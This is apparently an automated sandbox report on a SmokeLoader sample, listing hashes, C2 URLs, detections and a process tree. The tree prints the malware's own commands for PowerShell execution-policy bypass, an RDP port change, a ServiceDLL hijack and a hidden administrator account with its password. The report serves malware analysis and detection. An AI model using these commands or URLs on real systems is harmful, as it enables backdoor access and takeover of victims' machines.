Analysis
-
max time kernel
151s -
max time network
164s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
29-10-2021 04:59
Static task
static1
Behavioral task
behavioral1
Sample
42eabd90d252834ba52568b200e09dfd.exe
Resource
win7-en-20211014
Behavioral task
behavioral2
Sample
42eabd90d252834ba52568b200e09dfd.exe
Resource
win10-en-20210920
General
-
Target
42eabd90d252834ba52568b200e09dfd.exe
-
Size
185KB
-
MD5
42eabd90d252834ba52568b200e09dfd
-
SHA1
e758217035e67aa46e475e1b5fb79a7168e03078
-
SHA256
1206fbf7e6a98bf2ac11d17648cb27e3aa514774df47b8c071a4473ca4f382c5
-
SHA512
5c7d18f36093e786f06c3c383747d5f49f31677f091e6d0325d48e1d6f3de45218190a97df447a029ca896b79633a5cf7534da1513a4389eaa85b6d648db9312
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
smokeloader
2020
http://brandyjaggers.com/upload/
http://andbal.com/upload/
http://alotofquotes.com/upload/
http://szpnc.cn/upload/
http://uggeboots.com/upload/
http://100klv.com/upload/
http://rapmusic.at/upload/
Signatures
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
suricata: ET MALWARE ServHelper CnC Inital Checkin
suricata: ET MALWARE ServHelper CnC Inital Checkin
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
Processes:
powershell.exeflow pid process 49 1576 powershell.exe 51 1576 powershell.exe 52 1576 powershell.exe 53 1576 powershell.exe 55 1576 powershell.exe 57 1576 powershell.exe 59 1576 powershell.exe 61 1576 powershell.exe 63 1576 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
cawatag8028.exepid process 3948 cawatag 436 8028.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
pid process 3068 -
Loads dropped DLL 2 IoCs
Processes:
pid process 948 948 -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe -
Drops file in Windows directory 19 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\branding\Basebrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_fgdagsei.3oh.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID35A.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID37B.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID3AA.tmp powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID33A.tmp powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGID3BB.tmp powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vbbt5j3m.hxa.ps1 powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
42eabd90d252834ba52568b200e09dfd.execawatagdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 42eabd90d252834ba52568b200e09dfd.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 42eabd90d252834ba52568b200e09dfd.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 42eabd90d252834ba52568b200e09dfd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cawatag Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cawatag Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI cawatag -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exeWMIC.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\Icon = "shell32.dll#0018" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data." powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Flags = "71" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1400 = "1" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\e1be3f182420a0a0 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones," powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\shell = "0" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "My Computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\16\52C64B7E powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\PMDisplayName = "My Computer [Protected Mode]" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\1200 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\1200 = "3" powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 51 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 52 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 53 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 55 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
42eabd90d252834ba52568b200e09dfd.exepid process 2092 42eabd90d252834ba52568b200e09dfd.exe 2092 42eabd90d252834ba52568b200e09dfd.exe 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3068 -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 628 628 -
Suspicious behavior: MapViewOfSection 2 IoCs
Processes:
42eabd90d252834ba52568b200e09dfd.execawatagpid process 2092 42eabd90d252834ba52568b200e09dfd.exe 3948 cawatag -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1236 powershell.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeIncreaseQuotaPrivilege 1772 powershell.exe Token: SeSecurityPrivilege 1772 powershell.exe Token: SeTakeOwnershipPrivilege 1772 powershell.exe Token: SeLoadDriverPrivilege 1772 powershell.exe Token: SeSystemProfilePrivilege 1772 powershell.exe Token: SeSystemtimePrivilege 1772 powershell.exe Token: SeProfSingleProcessPrivilege 1772 powershell.exe Token: SeIncBasePriorityPrivilege 1772 powershell.exe Token: SeCreatePagefilePrivilege 1772 powershell.exe Token: SeBackupPrivilege 1772 powershell.exe Token: SeRestorePrivilege 1772 powershell.exe Token: SeShutdownPrivilege 1772 powershell.exe Token: SeDebugPrivilege 1772 powershell.exe Token: SeSystemEnvironmentPrivilege 1772 powershell.exe Token: SeRemoteShutdownPrivilege 1772 powershell.exe Token: SeUndockPrivilege 1772 powershell.exe Token: SeManageVolumePrivilege 1772 powershell.exe Token: 33 1772 powershell.exe Token: 34 1772 powershell.exe Token: 35 1772 powershell.exe Token: 36 1772 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeIncreaseQuotaPrivilege 4064 powershell.exe Token: SeSecurityPrivilege 4064 powershell.exe Token: SeTakeOwnershipPrivilege 4064 powershell.exe Token: SeLoadDriverPrivilege 4064 powershell.exe Token: SeSystemProfilePrivilege 4064 powershell.exe Token: SeSystemtimePrivilege 4064 powershell.exe Token: SeProfSingleProcessPrivilege 4064 powershell.exe Token: SeIncBasePriorityPrivilege 4064 powershell.exe Token: SeCreatePagefilePrivilege 4064 powershell.exe Token: SeBackupPrivilege 4064 powershell.exe Token: SeRestorePrivilege 4064 powershell.exe Token: SeShutdownPrivilege 4064 powershell.exe Token: SeDebugPrivilege 4064 powershell.exe Token: SeSystemEnvironmentPrivilege 4064 powershell.exe Token: SeRemoteShutdownPrivilege 4064 powershell.exe Token: SeUndockPrivilege 4064 powershell.exe Token: SeManageVolumePrivilege 4064 powershell.exe Token: 33 4064 powershell.exe Token: 34 4064 powershell.exe Token: 35 4064 powershell.exe Token: 36 4064 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeIncreaseQuotaPrivilege 3568 powershell.exe Token: SeSecurityPrivilege 3568 powershell.exe Token: SeTakeOwnershipPrivilege 3568 powershell.exe Token: SeLoadDriverPrivilege 3568 powershell.exe Token: SeSystemProfilePrivilege 3568 powershell.exe Token: SeSystemtimePrivilege 3568 powershell.exe Token: SeProfSingleProcessPrivilege 3568 powershell.exe Token: SeIncBasePriorityPrivilege 3568 powershell.exe Token: SeCreatePagefilePrivilege 3568 powershell.exe Token: SeBackupPrivilege 3568 powershell.exe Token: SeRestorePrivilege 3568 powershell.exe Token: SeShutdownPrivilege 3568 powershell.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeSystemEnvironmentPrivilege 3568 powershell.exe Token: SeRemoteShutdownPrivilege 3568 powershell.exe Token: SeUndockPrivilege 3568 powershell.exe Token: SeManageVolumePrivilege 3568 powershell.exe Token: 33 3568 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
Processes:
pid process 3068 3068 3068 3068 -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
pid process 3068 3068 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8028.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3068 wrote to memory of 436 3068 8028.exe PID 3068 wrote to memory of 436 3068 8028.exe PID 436 wrote to memory of 1236 436 8028.exe powershell.exe PID 436 wrote to memory of 1236 436 8028.exe powershell.exe PID 1236 wrote to memory of 3424 1236 powershell.exe csc.exe PID 1236 wrote to memory of 3424 1236 powershell.exe csc.exe PID 3424 wrote to memory of 1332 3424 csc.exe cvtres.exe PID 3424 wrote to memory of 1332 3424 csc.exe cvtres.exe PID 1236 wrote to memory of 1772 1236 powershell.exe powershell.exe PID 1236 wrote to memory of 1772 1236 powershell.exe powershell.exe PID 1236 wrote to memory of 4064 1236 powershell.exe powershell.exe PID 1236 wrote to memory of 4064 1236 powershell.exe powershell.exe PID 1236 wrote to memory of 3568 1236 powershell.exe powershell.exe PID 1236 wrote to memory of 3568 1236 powershell.exe powershell.exe PID 1236 wrote to memory of 1392 1236 powershell.exe reg.exe PID 1236 wrote to memory of 1392 1236 powershell.exe reg.exe PID 1236 wrote to memory of 2412 1236 powershell.exe reg.exe PID 1236 wrote to memory of 2412 1236 powershell.exe reg.exe PID 1236 wrote to memory of 2628 1236 powershell.exe reg.exe PID 1236 wrote to memory of 2628 1236 powershell.exe reg.exe PID 1236 wrote to memory of 3588 1236 powershell.exe net.exe PID 1236 wrote to memory of 3588 1236 powershell.exe net.exe PID 3588 wrote to memory of 1268 3588 net.exe net1.exe PID 3588 wrote to memory of 1268 3588 net.exe net1.exe PID 1236 wrote to memory of 3496 1236 powershell.exe cmd.exe PID 1236 wrote to memory of 3496 1236 powershell.exe cmd.exe PID 3496 wrote to memory of 2548 3496 cmd.exe cmd.exe PID 3496 wrote to memory of 2548 3496 cmd.exe cmd.exe PID 2548 wrote to memory of 3808 2548 cmd.exe net.exe PID 2548 wrote to memory of 3808 2548 cmd.exe net.exe PID 3808 wrote to memory of 3796 3808 net.exe net1.exe PID 3808 wrote to memory of 3796 3808 net.exe net1.exe PID 1236 wrote to memory of 1540 1236 powershell.exe cmd.exe PID 1236 wrote to memory of 1540 1236 powershell.exe cmd.exe PID 1540 wrote to memory of 3168 1540 cmd.exe cmd.exe PID 1540 wrote to memory of 3168 1540 cmd.exe cmd.exe PID 3168 wrote to memory of 2304 3168 cmd.exe net.exe PID 3168 wrote to memory of 2304 3168 cmd.exe net.exe PID 2304 wrote to memory of 1688 2304 net.exe net1.exe PID 2304 wrote to memory of 1688 2304 net.exe net1.exe PID 2988 wrote to memory of 1664 2988 cmd.exe net.exe PID 2988 wrote to memory of 1664 2988 cmd.exe net.exe PID 1664 wrote to memory of 1088 1664 net.exe net1.exe PID 1664 wrote to memory of 1088 1664 net.exe net1.exe PID 1768 wrote to memory of 1368 1768 cmd.exe net.exe PID 1768 wrote to memory of 1368 1768 cmd.exe net.exe PID 1368 wrote to memory of 3696 1368 net.exe net1.exe PID 1368 wrote to memory of 3696 1368 net.exe net1.exe PID 1412 wrote to memory of 1356 1412 cmd.exe net.exe PID 1412 wrote to memory of 1356 1412 cmd.exe net.exe PID 1356 wrote to memory of 1552 1356 net.exe net1.exe PID 1356 wrote to memory of 1552 1356 net.exe net1.exe PID 684 wrote to memory of 3108 684 cmd.exe net.exe PID 684 wrote to memory of 3108 684 cmd.exe net.exe PID 3108 wrote to memory of 352 3108 net.exe net1.exe PID 3108 wrote to memory of 352 3108 net.exe net1.exe PID 1588 wrote to memory of 1392 1588 cmd.exe net.exe PID 1588 wrote to memory of 1392 1588 cmd.exe net.exe PID 1392 wrote to memory of 2412 1392 net.exe net1.exe PID 1392 wrote to memory of 2412 1392 net.exe net1.exe PID 3648 wrote to memory of 3564 3648 cmd.exe net.exe PID 3648 wrote to memory of 3564 3648 cmd.exe net.exe PID 3564 wrote to memory of 2040 3564 net.exe net1.exe PID 3564 wrote to memory of 2040 3564 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\42eabd90d252834ba52568b200e09dfd.exe"C:\Users\Admin\AppData\Local\Temp\42eabd90d252834ba52568b200e09dfd.exe"1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Roaming\cawatagC:\Users\Admin\AppData\Roaming\cawatag1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\8028.exeC:\Users\Admin\AppData\Local\Temp\8028.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xmsfcbbl\xmsfcbbl.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95F3.tmp" "c:\Users\Admin\AppData\Local\Temp\xmsfcbbl\CSC48866E12B7054C7EA746A5145811453.TMP"4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc yGFc362I /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc yGFc362I /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc yGFc362I /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
